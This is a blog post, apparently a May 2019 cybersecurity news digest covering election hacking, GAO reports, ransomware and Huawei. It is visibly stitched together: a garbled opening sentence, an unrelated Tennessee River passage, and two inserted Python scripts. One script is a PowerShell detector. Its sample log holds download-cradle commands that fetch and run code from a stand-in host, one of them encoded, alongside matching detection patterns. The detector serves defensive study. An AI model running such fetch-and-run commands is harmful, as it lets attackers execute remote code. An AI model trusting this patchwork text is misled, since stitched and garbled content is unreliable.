Friday, May 10, 2019

MEdia Dragon: UK Government Announces Cyber Security Ambassador

“Wasn’t it Talleyrand who said, ‘After eighty, there are no enemies, only survivors’?” Louis Auchincloss, The House of the Prophet (this Talleyrand “quote” cannot be traced to a primary source)

Talleyrand also traced MEdia Dragon and Internal audit to the field of medicine terminology as we know what doctors need to reach internally when you start celebrating recycling teenagers years  ...



Shane Snow – journalist, geek, best-selling author: "two heads are better than one – but only if they think differently". A great reason to support diversity in HR hiring and development practices.

The cold river “flows up the map,” they used to say, first south, then west, and then north, and through some of the most verdant and beautiful country in America. It is called the Tennessee, but it drains some forty thousand square miles of land in seven states, from the Blue Ridge Mountains to Alabama, and from Mississippi to the Ohio River, an area nearly the size of England.
Before the 1930s, it ran wild, threatening each spring to flood and wash away the humble farms and homes along its banks. Most of it was not navigable for any distance, thanks to “an obstructive fist thrust up by God or Devil”—as the writer George Fort Milton characterized it—that created a long, untamed run of rapids known as Muscle Shoals. The fist dropped the river 140 feet over the course of 30 miles, and therein lay the untapped potential of the Tennessee, the chance to make power—a lot of it—out of water.
Where Our New World Begins (Harper's)




CNN

May 3, 2019

Two members of Congress who represent Florida are demanding a classified briefing from the Justice Department for the state's congressional delegation regarding the claim that Russia successfully hacked into at least one Florida county network before the 2016 election. “We are determined to learn as much as we can about what transpired so that, as lawmakers, we can take appropriate steps to prevent such intrusions from reoccurring in the future," US Reps. Stephanie Murphy, a Democrat, and Michael Waltz, a Republican, wrote in a letter dated Thursday to Attorney General William Barr and FBI Director Christopher Wray. Murphy and Waltz said the special counsel Robert Mueller's report "raises a host of critically-important questions that require answers."



CNN

May 2, 2019

The Government Accountability Office has urged the Census Bureau to step up its efforts to implement hundreds of action items on its cybersecurity to-do list, as well as recommendations made by the Department of Homeland Security. GAO, in a report released Tuesday, said the bureau still needs to address more than 500 cybersecurity vulnerabilities discovered during its security reviews, about half of which the bureau considers “high-risk” or “very high-risk.” The watchdog office also recommends that Census develop a formal process for tracking and implementing the 17 cybersecurity recommendations the Department of Homeland Security has made to the Bureau over the past two years. Nick Marinos, GAO’s director of information technology and cybersecurity, told members of the House Appropriations Subcommittee on Commerce, Justice, Science and Related Agencies that shoring up these vulnerabilities would reduce the Bureau’s overall risk of a data breach.



Politico

May 1, 2019

Senate Democrats and Republicans can agree on perhaps just one thing about special counsel Robert Mueller’s investigation — that Russia interfered in the 2016 presidential election. But bipartisan legislation to address foreign intrusions is all but dead amid a distinct lack of enthusiasm from Senate GOP leadership and the Trump White House. At a heated hearing with Attorney General William Barr on Wednesday, Sen. Amy Klobuchar (D-Minn.) blasted the White House for blocking the election security bill she co-sponsored with Sen. James Lankford (R-Okla.) in the previous Congress. And in an interview, Klobuchar put the blame for the impasse squarely on President Donald Trump’s former White House counsel Don McGahn as well as Senate Majority Leader Mitch McConnell. “It was Don McGahn,” Klobuchar said Wednesday. “He called Republicans about the bill, didn’t want them to do it. And McConnell also didn’t want the bill to move forward. So it was a double-edged thing.”


Nextgov

May 1, 2019

A Senate bill passed unanimously Tuesday would create a civilian personnel rotation program for federal cybersecurity professionals. The bipartisan Federal Rotational Cyber Workforce Program Act of 2019, authored by Sens. Gary Peters, D-Mich., and John Hoeven, R-N.D., would establish a rotational system to allow select IT and cybersecurity professionals to apply for duty assignments of between 180 days and one year. Under the program, existing federal tech talent would have avenues to bolster their training and experience, while smaller agencies would gain access to cyber employees who can improve their security posture. “I’m pleased the Senate passed this bipartisan bill to help the federal government recruit and retain highly skilled cybersecurity professionals, address staffing challenges in agencies across government, and strengthen our ability to combat cybersecurity threats and secure our systems,” Peters said in a statement.



FCW

May 1, 2019

The Transportation Security Administration has submitted a plan to keep pipeline cybersecurity guidelines up to date, the Government Accountability Office's acting director told a May 1 House Energy and Commerce Energy Subcommittee hearing on pipeline security. TSA has federal oversight responsibility for the physical security and cybersecurity of oil, natural gas and hazardous materials pipelines in the U.S. That pipeline infrastructure is mostly privately held. In his testimony at the hearing, GAO Acting Director William Russell referenced his agency's December 2018 report on TSA's pipeline oversight. In that report, the GAO had recommended TSA formally document its review and revision processes for its Pipeline Security Guidelines for private pipeline infrastructure providers. The GAO also found weakness in TSA's cybersecurity workforce, as well as a shortage of workers. The watchdog agency said staffing levels for the agency's pipeline branch have fluctuated "significantly" from a single worker in 2014, to six between 2015 and 2018. Those workers, it said, lacked cybersecurity expertise.



ADMINISTRATION



AP

May 2, 2019

While candidates were focused on campaigning in 2016, Russians were carrying out a devastating cyber operation that changed the landscape of American politics, with aftershocks continuing well into Donald Trump's presidency. And it all started with the click of a tempting email and a typed-in password. Whether presidential campaigns have learned from the cyberattacks is a critical question ahead as the 2020 election approaches. Preventing the attacks won't be easy or cheap. "If you are the Pentagon or the NSA, you have the most skilled adversaries in the world trying to get in but you also have some of the most skilled people working defense," said Robby Mook, who ran Hillary Clinton's campaign in 2016. "Campaigns are facing similar adversaries, and they don't have similar resources and virtually no expertise." Traditionally, cybersecurity has been a lower priority for candidates, especially at the early stages of a campaign. They need to raise money, hire staff, pay office rents, lobby for endorsements and travel repeatedly to early voting states. Particularly during primary season, campaign managers face difficult spending decisions: Air a TV ad targeting a key voting demographic or invest in a more robust security system for computer networks?



CyberScoop

May 2, 2019

The White House issued an executive order Thursday that is intended to bolster the nation’s cybersecurity workforce. The order includes provisions geared toward the federal government’s employees, as well as education and career development initiatives for the U.S. workforce in general. The goal is to build a “superior cybersecurity workforce,” one senior administration official told reporters on a call about the order Thursday. The White House wants to create a President’s Cup Cybersecurity Competition that “will identify, challenge, and reward the government’s best personnel supporting cybersecurity and cyber excellence,” one official said on the call. Other elements include allowing cybersecurity employees to rotate among agencies and using new cybersecurity aptitude tests as part of efforts to reskill federal workers.



Ars Technica


AvengerCon was the brainchild of Capt. Skyler Onken and Capt. Steve Rogacki. Until recently, Onken was company commander for Alpha Company 781st Military Intelligence Battalion, a component of the 780th MI Brigade—nicknamed "the Avengers," thus the event's name. He has now moved on to the US Army Cyber School at Fort Gordon, Georgia. Rogacki is an officer from a unit at Fort Gordon, Georgia. The two came up with the idea for AvengerCon while attending DEF CON a few years ago. While sitting at a Johnny Rockets at the Flamingo Hotel in Las Vegas, Onken said, the two were reveling in the experience of DEF CON. "It's such great experience just being a part of the [hacker] community, the things you learn, things you get to try, it gets you excited," he recalled. "And we were like, 'We wish that the soldiers could get that.'"



AP

May 2, 2019

A British cybersecurity researcher credited with stopping a worldwide computer virus in 2017 has pleaded guilty in Wisconsin federal court to developing malware to steal banking information. Marcus Hutchins appeared in court Thursday after he agreed last month to plead guilty to developing a malware called Kronos and conspiring to distribute it from 2012 to 2015. Prosecutors dismissed eight more charges in exchange for his plea. Sentencing for Hutchins is set for July 26. He faces up to 10 years in prison but could receive a more lenient sentence for accepting responsibility.



Nextgov

May 1, 2019

Under the White House’s new shared services policy, the Homeland Security Department has been chosen as the official lead agency for all cybersecurity acquisitions, programs and standards across government. Security leaders at federal agencies say they’re on board with this structure, so long as Homeland Security officials don’t try to force everyone into the same box. Homeland Security was named as the Quality Services Management Office for cybersecurity, a new designation that puts the department at the center of all cybersecurity decisions governmentwide. As agencies improve their existing capabilities or stand up new ones, Homeland Security will have authority to set the standards by which those agencies operate. “I actually appreciate the top-cover,” said Eric Rippetoe, chief information security officer for the Federal Energy Regulatory Commission. “A lot of these things that they’re telling us to do, I’ve been trying to do anyway.”



The Marine Corps Times

May 1, 2019

Plans to bolster the Marine Corps’ cohort of cyber experts are moving forward, but this new unit won’t be donning the Marine Corps uniform. The Corps will create a new Cyber Auxiliary division, Commandant Gen. Robert Neller said Monday, and its new force will not be beholden to strict Marine grooming standards. “We are going to do a Marine Corps Cyber Auxiliary, for the record,” Neller said at the Future Security Forum in Washington. “If anybody wants to join, you can sign up. You can have purple hair, too, but no [Eagle, Globe and Anchor]." The comment was easy to dismiss as a joke, but Marine officials said the Cyber Auxiliary unit is a serious endeavor that is moving forward, although confirmed details are scarce. “I will confirm, however, that the CMC was not joking about the creation of a new cyber unit,” said Capt. Joseph Butterfield, Headquarters Marine Corps spokesman.



CyberScoop


As hackers continue to use native programming tools to blend into target networks, Mitre Corp. is beginning to test vendors’ ability to detect those techniques. The federally-funded, not-for-profit organization announced Wednesday it would throw the stealthy tactics of an infamous hacking group, the Russian-government-linked APT29, at several threat-detection products. But the evaluation is about more than one set of adversaries. The “living off the land” techniques, such as hiding in PowerShell scripts, that will be tested are increasingly popular with a variety of hacking groups. “A lot of these techniques are going to be implemented in similar ways from different adversaries,” said Frank Duff, Mitre’s lead for evaluations that use the organization’s ATT&CK framework. “PowerShell monitoring is that next thing that everyone recognizes is absolutely necessary,” he added. Mitre’s last round of testing focused on advanced persistent threats, mimicking the tactics of APT3, a China-based group known for using internet-browser exploits. But the techniques of APT29, best known for being one of two Russian outfits to breach the Democratic National Committee before the 2016 U.S. election, will be a stiffer test, according to Duff.
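The "PowerShell monitoring" Duff refers to is, in day-to-day detection work, mostly a matter of inspecting command lines and decoding what the -EncodedCommand switch hides. The block below is an added example, not Mitre's evaluation tooling or anything published with the article: a small detector run over constructed process-creation log lines (the tab-separated layout, the host and user names, the parent processes and the example.invalid URL are all made up for illustration, and the weights and threshold are assumptions). It scores the switches attackers use to hide or unlock PowerShell, flags office applications spawning it, decodes the UTF-16LE base64 payload and searches both the visible and the decoded command for download cradles.

```python
"""Score 'living off the land' PowerShell usage in constructed process-creation
log lines. Added example; the log layout and sample lines are invented."""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Parents that have no business launching PowerShell (assumption: tune per estate).
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                      "mshta.exe", "wscript.exe", "cscript.exe"}

# PowerShell accepts any unambiguous prefix of a switch, so -enc, -e, -ep and
# -w hidden all have to be recognised, not just the long spellings.
SWITCH_PATTERNS = {
    "encoded_command": re.compile(r"(?i)\s-(e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})"),
    "hidden_window":   re.compile(r"(?i)-w(indowstyle)?\s+hidden"),
    "no_profile":      re.compile(r"(?i)-nop(rofile)?\b"),
    "policy_bypass":   re.compile(r"(?i)-e(xecutionpolicy|p)\s+bypass"),
}
CRADLE_PATTERN = re.compile(
    r"(?i)(Invoke-Expression|\bIEX\b|Net\.WebClient|DownloadString|DownloadFile|"
    r"Invoke-WebRequest|\biwr\b|FromBase64String)")
WEIGHTS = {"encoded_command": 2, "hidden_window": 2, "no_profile": 1, "policy_bypass": 2,
           "suspicious_parent": 3, "download_cradle": 3}  # assumed weights


def _encode_for_powershell(script: str) -> str:
    """-EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample, one event per line: "<timestamp>\t<user>\t<parent>\t<command line>"
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
SAMPLE_LOG = "\n".join([
    "2019-05-01T09:12:03Z\tCORP\\alice\texplorer.exe\tpowershell.exe -NoProfile -File C:\\Scripts\\backup.ps1",
    "2019-05-01T09:13:44Z\tCORP\\bob\twinword.exe\tpowershell.exe -nop -w hidden -enc " + _encode_for_powershell(CRADLE),
    "2019-05-01T09:15:10Z\tCORP\\svc_sql\tservices.exe\tpowershell.exe Get-Service",
    "2019-05-01T09:16:21Z\tCORP\\carol\tcmd.exe\tpowershell.exe -ep bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/b')\"",
])


@dataclass
class Finding:
    timestamp: str
    user: str
    parent: str
    score: int
    reasons: List[str]
    decoded: Optional[str]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext behind -EncodedCommand, or None if absent/undecodable."""
    m = SWITCH_PATTERNS["encoded_command"].search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_line(line: str) -> Optional[Finding]:
    """Score one event; None if it is not a PowerShell launch."""
    ts, user, parent, cmdline = line.split("\t", 3)
    if "powershell" not in cmdline.lower():
        return None
    reasons = [name for name, pat in SWITCH_PATTERNS.items() if pat.search(cmdline)]
    if parent.lower() in SUSPICIOUS_PARENTS:
        reasons.append("suspicious_parent")
    decoded = decode_encoded_command(cmdline)
    # Check the decoded payload too: -enc exists precisely to keep the cradle
    # out of the visible command line.
    if CRADLE_PATTERN.search(cmdline) or (decoded and CRADLE_PATTERN.search(decoded)):
        reasons.append("download_cradle")
    return Finding(ts, user, parent, sum(WEIGHTS[r] for r in reasons), reasons, decoded)


def analyze(log_text: str, threshold: int = 3) -> List[Finding]:
    """Return the events whose score reaches the (assumed) alert threshold."""
    findings = []
    for line in log_text.splitlines():
        if line.strip():
            f = analyze_line(line)
            if f is not None and f.score >= threshold:
                findings.append(f)
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f.timestamp, f.user, f.parent, f.score, f.reasons)
        if f.decoded:
            print("  decoded:", f.decoded)
```

The benign administrative launch (a scheduled script run with -NoProfile) scores below the threshold, while the Word-spawned, hidden, encoded download cradle and the cmd.exe-launched -ep bypass cradle are both surfaced. Command-line inspection alone still misses scripts whose payload arrives from a file or a remote fetch; script block logging, which records the content PowerShell actually executes, is the complementary source.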



The Washington Post

April 30, 2019

In recent months, U.S. national security officials have been preparing for Russian interference in the 2020 presidential race by tracking cyber threats, sharing intelligence about foreign disinformation efforts with social media companies and helping state election officials protect their systems against foreign manipulation. But these actions are strikingly at odds with statements from President Trump, who has rebuffed warnings from his senior aides about Russia and sought to play down that country’s potential to influence American politics. The president’s rhetoric and lack of focus on election security has made it tougher for government officials to implement a more comprehensive approach to preserving the integrity of the electoral process, current and former officials said. Officials insist that they have made progress since 2016 in hardening defenses. And top security officials, including the director of national intelligence, say the president has given them “full support” in their efforts to counter malign activities. But some analysts worry that by not sending a clear, public signal that he understands the threat foreign interference poses, Trump is inviting more of it.



SC Magazine

April 30, 2019

The Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) today issued a list of the 55 areas of the nation’s critical infrastructure that it believes must be protected from cyberattacks. The National Critical Functions list was created by CISA’s National Risk Management Center and contains functions used or supported by the government and the private sector “that are of such vital importance to the United States that their disruption, corruption or dysfunction would have a debilitating effect on security, national economic security, national public health or safety, or any combination thereof,” CISA said. The list was developed with the help of all 16 critical infrastructure sectors; all Sector-Specific Agencies; and the State, Local, Tribal, and Territorial (SLTT) Government Coordinating Council. “Identifying these National Critical Functions has been a collaborative process between public and private sector partners and marks a significant step forward in the way we think about and manage risk,” said CISA Director Christopher Krebs.



FCW


The Department of Homeland Security released a new Binding Operational Directive April 29 that cuts in half the time federal agencies have to patch critical IT vulnerabilities, from 30 days to 15. The order compels all civilian federal agencies to regularly review weekly cyber hygiene reports delivered by DHS that identify both critical and high vulnerabilities and patch them within 15 and 30 calendar days, respectively, of being detected, not of the agency first being informed about them. According to the directive, CISA is exploring a way to send real-time alerts to agencies when a vulnerability is discovered so they don't have to wait for the weekly hygiene reports to start patching. If agencies fail to patch within those timeframes, DHS will essentially write a remediation plan for them and begin addressing the problem with top IT officials at the agency.
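The operational consequence of the detection-based clock is that an agency which only starts counting when the weekly report lands has already spent part of its window. The following is an added example, not DHS's or FCW's code, that takes a constructed findings report in a made-up CSV layout (the hostnames, dates and column names are invented; the real Cyber Hygiene report layout is not reproduced here) and classifies each finding against the 15- and 30-calendar-day windows measured from the detection date.

```python
"""Classify vulnerability findings against fixed remediation windows measured
from detection. Added example; report layout and sample rows are constructed."""
from datetime import date, timedelta
from typing import Dict, List, Tuple, Union

WINDOW_DAYS = {"critical": 15, "high": 30}  # calendar days, per the directive as summarised

# Constructed sample: "host,severity,detected,notified,fixed" (fixed blank if still open)
SAMPLE_REPORT = """\
host,severity,detected,notified,fixed
web01.agency.example,critical,2019-04-01,2019-04-08,
vpn02.agency.example,high,2019-04-01,2019-04-08,2019-04-20
mail03.agency.example,critical,2019-04-20,2019-04-22,
db04.agency.example,high,2019-04-25,2019-04-29,
"""


def _parse_date(s: str):
    return date.fromisoformat(s) if s else None


def parse_report(text: str) -> List[dict]:
    """Turn the CSV-like report into dicts with real date objects."""
    lines = [l for l in text.splitlines() if l.strip()]
    header = lines[0].split(",")
    findings = []
    for line in lines[1:]:
        row = dict(zip(header, line.split(",")))
        row["severity"] = row["severity"].lower()
        for key in ("detected", "notified", "fixed"):
            row[key] = _parse_date(row[key])
        findings.append(row)
    return findings


def deadline(finding: dict) -> date:
    # The clock starts at detection, not at the date the agency was told.
    return finding["detected"] + timedelta(days=WINDOW_DAYS[finding["severity"]])


def classify(finding: dict, as_of: date) -> Tuple[str, int]:
    """Return (status, days past deadline); negative means before the deadline."""
    due = deadline(finding)
    reference = finding["fixed"] or as_of
    slip = (reference - due).days
    if finding["fixed"] is not None:
        status = "fixed_late" if slip > 0 else "fixed_on_time"
    else:
        status = "overdue" if slip > 0 else "open"
    return status, slip


def triage(text: str, as_of: Union[str, date]) -> Dict[str, Tuple[str, int]]:
    """Map host -> (status, slip) for every finding in the report."""
    if isinstance(as_of, str):
        as_of = date.fromisoformat(as_of)
    return {f["host"]: classify(f, as_of) for f in parse_report(text)}


if __name__ == "__main__":
    for host, (status, slip) in triage(SAMPLE_REPORT, "2019-05-01").items():
        print(f"{host:24} {status:14} {slip:+d} days vs deadline")
```

In the sample, web01 was detected on 1 April and reported to the agency a week later; counted from detection its critical finding was due on 16 April and is 15 days overdue on 1 May, whereas counting from notification would understate the slip by a week.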



INDUSTRY



Computer Weekly

May 3, 2019

Norwegian aluminium giant Norsk Hydro is urging partners to be cautious in the wake of a damaging ransomware attack in March as financial impact estimates come in above initial estimates. Initial estimates put the financial impact of Norsk Hydro’s ransomware attack in March at around $41m, but latest estimates put the cost at between $45.6m and $51.3m. The company has issued a warning to partners that malicious actors could contact them pretending to represent the aluminium producer. “This may be an attempt to spread the virus further or deceive our customers, suppliers or other partners,” the company said in a warning on its website. “We therefore ask our partners to show extra caution when receiving emails from Hydro during this period. For instance, please note that Hydro is not under any circumstances asking our partners to change bank accounts. Anyone who is in doubt about the credibility of an email from Hydro should call the sender to verify,” the warning said. The Norwegian National Security Authority (NSM), which was alerted to the attack, identified the ransomware involved as LockerGoga, which was linked to an attack on French engineering consultancy Altran Technologies in January.



CyberScoop

May 3, 2019

For years, software, not hardware, has dominated the cybersecurity industry’s efforts to develop a coordinated way of disclosing technology flaws. Software bugs are reported in much greater numbers, and there are far fewer researchers who specialize in hardware security. But hardware was thrust into the limelight in January 2018, when Spectre and Meltdown, two vulnerabilities that affected virtually all modern computer chips, were made public. The flaws could have allowed hackers to infiltrate a computer’s memory and steal sensitive data, or trick applications into spilling information without a user’s knowledge. While there’s no evidence either has been exploited, the revelation that they exist, and the complex patching process that followed, sparked industry-wide awareness about serious security flaws that might come embedded in otherwise trusted technology. Now, more than a year later, the vendors, researchers, and manufacturers involved are still trying to cut down on the time it takes to get hardware-related patches deployed.



CNBC

May 2, 2019

Electrical grid operations in two huge U.S. population areas — Los Angeles County in California, and Salt Lake County in Utah — were interrupted by a distributed-denial-of-service attack in March, according to the Department of Energy’s Electric Emergency and Disturbance Report for March. The attack did not disrupt electrical delivery or cause any outages, the Department of Energy confirmed, but caused “interruptions” in “electrical system operations.” In this case, “operations” does not refer to electrical delivery to consumers, but could cover any computer systems used within the utilities, including those that run office functions or operational software. Although the attack did not interrupt service, denial-of-service attacks are easily preventable, and most large organizations no longer consider them major threats. The fact that it succeeded calls into question whether the utilities are prepared for a far more sophisticated attack, as the U.S. government has warned about.



Gov Info Security

May 1, 2019

Citrix says the data breach it first disclosed in early March appears to have persisted for six months before being discovered. The company believes it has now expelled any hackers from its network. The technology giant, which is based in Fort Lauderdale, Florida, was alerted to the suspected intrusion on March 6 by the FBI and then launched an investigation, which is ongoing. Citrix on Monday submitted a data breach notification to the California attorney general's office, as TechCrunch first reported. Such notifications are required by law in all 50 states for many types of breaches that result in residents' personal details being exposed.



Ars Technica

April 30, 2019

Attackers have been actively exploiting a critical zero-day vulnerability in the widely used Oracle WebLogic server to install ransomware, with no clicking or other interaction necessary on the part of end users, researchers from Cisco Talos said on Tuesday. The vulnerability and working exploit code first became public two weeks ago on the Chinese National Vulnerability Database, according to researchers from the security educational group SANS ISC, who warned that the vulnerability was under active attack. The vulnerability is easy to exploit and gives attackers the ability to execute code of their choice on cloud servers. Because of their power, bandwidth, and use in high-security cloud environments, these servers are considered high-value targets. The disclosure prompted Oracle to release an emergency patch on Friday.



BBC

April 30, 2019

Vodafone has denied a report saying issues found in equipment supplied to it by Huawei in Italy in 2011 and 2012 could have allowed unauthorised access to its fixed-line network there. A Bloomberg report said that Vodafone spotted security flaws in software that could have given Huawei unauthorised access to Italian homes and businesses. The US refuses to use Huawei equipment for security reasons. However, reports suggest the UK may let the firm help build its 5G network. This is despite the US wanting the UK and its other allies in the "Five Eyes" intelligence grouping - Canada, Australia and New Zealand - to exclude the company. In a statement, Vodafone said: "The issues in Italy identified in the Bloomberg story were all resolved and date back to 2011 and 2012. The 'backdoor' that Bloomberg refers to is Telnet, which is a protocol that is commonly used by many vendors in the industry for performing diagnostic functions. It would not have been accessible from the internet.”



Vice Motherboard

April 30, 2019

Hackers have broken into an internet infrastructure firm that provides services to dozens of the world’s largest and most valuable companies, including Oracle, Volkswagen, Airbus, and many more as part of an extortion attempt, Motherboard has learned. The attackers have also released data from all of those companies, according to a website seemingly set up by the hackers to distribute the stolen material. Citycomp, the impacted Germany-based firm, provides servers, storage, and other computer equipment to large companies, according to the company’s website. Michael Bartsch, executive director of Deutor Cyber Security Solutions, a firm Citycomp said was authorized to speak about the case, confirmed the breach to Motherboard in an email Tuesday. “Citycomp has been hacked and blackmailed and the attack is ongoing,” Bartsch wrote. “We have to be careful as the whole case is under police investigation and the attacker is trying all tricks.”



The Washington Post

April 30, 2019

The auto industry is downplaying the immediate risk of car-hacking after a report about a cyber-intruder’s use of GPS trackers that allowed him to monitor the location of thousands of vehicles in commercial fleets and even turn off their engines. “Hacking is not like you see it on TV,” said Gloria Bergquist, a spokeswoman for the Alliance of Automobile Makers. But she said automakers take the threat seriously and are focusing more on shielding vehicles’ computer systems from possible intruders. “Vehicles are highly complex with multiple layers of security, and remote access is exceedingly difficult by design,” Bergquist said in an email. “New cars being launched now have an exponential increase in cybersecurity. Automakers are collaborating in all areas possible, including hardware, software and knowledge sharing with suppliers, government and the research community.” Motherboard reported last week that the hacker — identified only by the handle L&M — cracked more than 7,000 iTrack accounts and more than 20,000 Protrack accounts that some companies use to manage their commercial fleets through GPS signals.



Business Insider

April 30, 2019

The CEOs of some of the top financial institutions in America are increasingly worried about the risk of a cybersecurity attack on the nation's financial system. Speaking at the Milken Global Institute, David Hunt, CEO of Prudential Global Investment Management, was the latest executive to highlight the risk. "The next crisis is going to come from a different place," Hunt said. "I think it's going to come from technology and cyber. If I were looking for the thing that worries me the most, it would be an actual attack on the infrastructure of the financial markets that really bursts into it and creates a shutdown of the major pipes we use to do business." Several other Wall Street institutions have also warned of the risks of a cyberattack. In his 2019 annual letter to shareholders, JPMorgan CEO Jamie Dimon said cybersecurity "may very well be the biggest threat to the US financial system."



Gov Info Security

April 29, 2019

Nearly 2 million internet of things devices, including security cameras, baby monitors and "smart" doorbells, are vulnerable to being compromised due to a flaw in their built-in peer-to-peer software, a security researcher warns. Paul Marrapese, an independent security researcher from San Jose, California, has published research warning that peer-to-peer software developed by Chinese firm Shenzhen Yunni Technology that's used in millions of IoT devices around the world has a vulnerability that could allow an attacker to eavesdrop on conversations or press household items into service as nodes in a botnet. The Shenzhen Yunni software, called iLnkP2P, is designed to enable a user to connect to IoT devices from anywhere by using a smartphone app. The iLnkP2P functionality is built into a range of products from companies that include HiChip, TENVIS, SV3C, VStarcam, Wanscam, NEO Coolcam, Sricam, Eye Sight, and HVCAM.



ZDNet

April 29, 2019

The extent of the cyberattack was so bad that it just didn't seem possible that something so destructive could have happened so quickly. "I remember that morning – laptops were sporadically restarting and it didn't appear to be a cyberattack at the time but very quickly the true impact became apparent," said Lewis Woodcock, head of cybersecurity compliance at Moller-Maersk, the world's largest container shipping firm. "The severity for me was really taken in when walking through the offices and seeing banks and banks of screens, all black. There was a moment of disbelief, initially, at the sheer ferocity and the speed and scale of the attack and the impact it had." Speaking in a keynote session at CYBER UK 19 – a cybersecurity conference hosted by the UK's National Cyber Security Centre (NCSC) – Woodcock was reliving the events of 27 June 2017 when the shipping and logistics giant Maersk was an unintended victim of NotPetya ransomware. The company was one of the most badly hit of those caught in the crossfire of NotPetya, with almost 50,000 infected endpoints and thousands of applications and servers across 600 sites in 130 countries. While Maersk did lose revenue, it pulled through thanks to what Woodcock described as "a whole company effort to recover" which was aided by input from partners, vendors and customers.



Vice Motherboard

April 27, 2019

Docker, a company that makes software tools for programmers and developers, said on Friday that hackers had accessed one of its Docker Hub databases and could have stolen sensitive data from around 190,000 accounts. Experts Motherboard spoke to said that, in a worst-case scenario, the hackers would have been able to access proprietary source code from some of those accounts. Specifically, Docker allows developers to run software packages known as “containers.” It is used by some of the largest tech companies in the world, though it is not yet publicly known what information was accessed and which companies’ accounts were affected. Docker disclosed the breach in an email to customers and users of Docker Hub, its cloud-based service that’s used by several companies and thousands of developers all over the world. In the email, obtained by Motherboard, Docker said that the stolen data includes “usernames and hashed passwords for a small percentage of these users, as well as Github and Bitbucket tokens for Docker autobuilds.”



INTERNATIONAL



AP

May 3, 2019

Cybersecurity officials from dozens of countries drew up a blueprint on Friday to counter threats and ensure the safety of next generation mobile networks that their nations are set to start deploying. Officials hammered out a set of non-binding proposals published at the end of a two-day meeting organized by the Czech government to discuss the security of new 5G networks. The meeting comes amid a simmering global battle between the U.S. and China's Huawei, the world's biggest maker of network infrastructure equipment. The U.S. has been lobbying allies to ban Huawei from 5G networks over concerns China's government could force the company to give it access to data for cyberespionage. Huawei has denied the allegations. Officials called for a cooperative approach to security, saying that they didn't want to target specific countries or companies.



Wired

May 3, 2019

A software supply chain attack represents one of the most insidious forms of hacking. By breaking into a developer's network and hiding malicious code within apps and software updates that users trust, supply chain hijackers can smuggle their malware onto hundreds of thousands—or millions—of computers in a single operation, without the slightest sign of foul play. Now what appears to be a single group of hackers has managed that trick repeatedly, going on a devastating supply chain hacking spree—and becoming more advanced and stealthy as they go. Over the past three years, supply chain attacks that exploited the software distribution channels of at least six different companies have now all been tied to a single group of likely Chinese-speaking hackers. They're known as Barium, or sometimes ShadowHammer, ShadowPad, or Wicked Panda, depending on which security firm you ask. More than perhaps any other known hacker team, Barium appears to use supply chain attacks as their core tool. Their attacks all follow a similar pattern: Seed out infections to a massive collection of victims, then sort through them to find espionage targets.



CyberScoop

May 3, 2019

China’s cyber-theft and cyber-espionage operations are accelerating to the point that they can “degrade core U.S. operational and technological advantages,” according to a congressionally mandated assessment of the Chinese military the Pentagon issued Friday. Last year, for example, Chinese intelligence officers were indicted for allegedly conspiring to steal technological information on turbofan engines. China’s efforts to steal sensitive U.S. military-grade equipment more broadly targeted aviation and antisubmarine warfare technologies last year. “The threat and the challenge is persistent. The Chinese remain very aggressive in their use of cyber,” Assistant Secretary of Defense Randall G. Schriver said Friday during a press briefing on the report. China’s efforts to boost its technological prowess go beyond thefts and intrusions, the Pentagon said. Beijing also leverages its intelligence services and Chinese nationals’ access to technologies to try building up its military capabilities while checking adversaries’, the report notes.



The Sydney Morning Herald

May 3, 2019

Former prime minister Malcolm Turnbull's handpicked cybersecurity tsar Alastair MacGibbon is quitting his role and has declared cyber attacks "the greatest existential threat we face". Mr. MacGibbon has been the face of cybersecurity for federal authorities for the past three years, handling the public response to the cyberattack on the national census in 2016 and the hacking earlier this year of the Parliament and the major political parties. The announcement of Mr. MacGibbon's resignation from the role of national cyber security adviser comes just two weeks before the federal election, but he stressed he was not stepping down because of any possible change of government. While saying he didn't downplay the seriousness of threats such as terrorism or long-term challenges such as climate change, Mr. MacGibbon said the sheer scale and rising likelihood of major cyber attacks made them the most pressing threat a country like Australia faces. "Should a successful, major cyber attack occur, it can cripple a society," he said.



The New York Times

May 2, 2019

Trade negotiations between the United States and China are entering the final stage, but a deal is expected to fall short of addressing several key Trump administration goals, including combating Chinese cybertheft and state subsidies at various levels of the Chinese government, officials from a leading American business group said on Thursday. President Trump has repeatedly insisted that a United States-China trade deal will address what he says is a pattern of China illegally gaining access to American computer networks. He has also said it will end economic practices like subsidies that the United States says gives China an unfair competitive edge. But Chinese negotiators have pushed back against discussing cybertheft in the context of the negotiations, arguing for the issue to be dealt with in a different forum, Myron Brilliant, the executive vice president and head of international affairs at the U.S. Chamber of Commerce, said on Thursday in a call with reporters.



ZDNet

May 1, 2019

For the past three years, a mysterious hacker has been selling Windows zero-days to at least three cyber-espionage groups, as well as cyber-crime gangs, researchers from Kaspersky Lab have told ZDNet. The hacker's activity reinforces recent assessments that some government-backed cyber-espionage groups, also known as APTs (advanced persistent threats), will regularly buy zero-day exploits from third-party entities, besides developing their own in-house tools. APT groups believed to be operating out of Russia and the Middle East have often been spotted using zero-days developed by real-world companies that act as sellers of surveillance software and exploit brokers for government agencies. However, Kaspersky's recent revelations show that APT groups won't shy away from dipping their toes in the underground hacking scene to acquire exploits initially developed by lone hackers for cyber-crime groups, whenever necessary.



CyberScoop

May 1, 2019

